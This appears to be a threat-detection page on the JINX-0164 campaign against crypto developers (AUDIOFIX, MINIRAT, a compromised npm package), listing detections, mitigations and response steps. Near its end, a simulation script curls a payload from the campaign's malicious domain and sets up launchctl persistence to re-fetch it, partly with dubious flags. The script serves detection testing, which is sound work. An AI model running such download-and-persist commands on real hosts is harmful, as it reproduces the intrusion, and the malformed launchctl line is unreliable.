Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A financially motivated threat actor tracked as JINX-0164 is targeting cryptocurrency developers through LinkedIn social engineering, macOS malware, and CI/CD compromise. The group deploys a custom Python RAT known as AUDIOFIX and a Go-based backdoor called MINIRAT, both configured to communicate with hard-coded command-and-control domains. After gaining access, the attackers steal cloud and development credentials, tamper with code repositories, and even publish malicious npm packages to expand access and enable cryptocurrency theft. The campaign reflects a sophisticated supply-chain threat aimed at the software development lifecycle.
Investigation
Wiz CIRT followed the intrusion from the initial LinkedIn outreach through malicious link delivery, execution of macOS payloads, theft of credentials, and lateral movement into source code repositories. Their investigation uncovered dropper scripts, persistence through launchctl, and the use of the nord-stream tool for secret exfiltration. Researchers also identified multiple spoofed domains, VPN exit nodes, and a supply-chain compromise involving the @velora-dex/sdk npm package. File paths, hashes, domains, and IP addresses were collected to support detection and threat hunting.
Mitigation
Recommended defenses include monitoring macOS systems for launchctl persistence, detecting suspicious LaunchAgents, and blocking the known malicious domains and command-and-control servers. Organizations should enforce signed commits, enable GitHub Vigilant Mode, and watch for unverified commits or unusual CI/CD workflow changes. VPN use should be limited to approved providers, and MFA should be required for cloud accounts and development platforms.
Response
If this activity is detected, isolate the affected macOS system immediately, collect forensic artifacts, and revoke any compromised credentials and API tokens. Security teams should perform a full review of code repositories for malicious commits and remove any compromised npm packages. The identified command-and-control domains should be blocked, and firewall rules should be updated to deny traffic to the malicious IP addresses. Relevant stakeholders should be notified, and threat intelligence sharing with trusted industry partners should be considered.
Attack Flow
We are still updating this part. Sign up to get notified
Notify MeDetections
Suspicious File Download Direct IP (via proxy)
View
Possible IP Lookup Domain Communications Attempted (via dns)
View
MacOS Launchctl Execution Attempt (via cmdline)
View
Possible Execution by Use of chmod and nohup in Single Command (via cmdline)
View
Possible Base64 Encoded Strings Manipulation [MacOS] (via cmdline)
View
Suspicious Curl Execution Attempt [MacOS] (via cmdline)
View
IOCs (HashSha256) to detect: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry’s Software Development Infrastructure
View
IOCs (SourceIP) to detect: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry’s Software Development Infrastructure
View
IOCs (DestinationIP) to detect: Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry’s Software Development Infrastructure
View
Detection of AUDIOFIX Malware Persistence and Payload Download [Linux Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Initial foothold: An attacker delivers a phishing email containing a malicious link (T1566.004). The victim clicks the link, which points to
https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh. - Payload download: The victim’s terminal executes a
curlcommand that silently fetches the script. - Persistence setup: The script registers a launch agent using
launchctl submit, embedding the samecurlcommand so the payload is re‑downloaded on each boot (T1546.006). - Execution: The launch agent runs with system privileges, executing the downloaded script to compromise the host.
- Initial foothold: An attacker delivers a phishing email containing a malicious link (T1566.004). The victim clicks the link, which points to
-
Regression Test Script: (run on a test macOS machine; requires admin rights)
#!/bin/bash set -euo pipefail # 1. Simulate the malicious curl download (no actual malicious code) MALICIOUS_URL="https://apple.driver-update.io/troubleshoot/mac/audio-issue-fix.sh" curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh # 2. Register a launch agent that re‑downloads the script on boot launchctl submit -l com.malicious.audiofix -p /usr/bin/curl -a -c -t "30" /usr/bin/curl -fsSL "$MALICIOUS_URL" -o /tmp/audio-fix.sh echo "Malicious launch agent registered. Check SIEM for detection." -
Cleanup Commands:
# Remove the launch agent launchctl remove com.malicious.audiofix || true # Delete the downloaded script rm -f /tmp/audio-fix.sh echo "Cleanup complete."
End of Report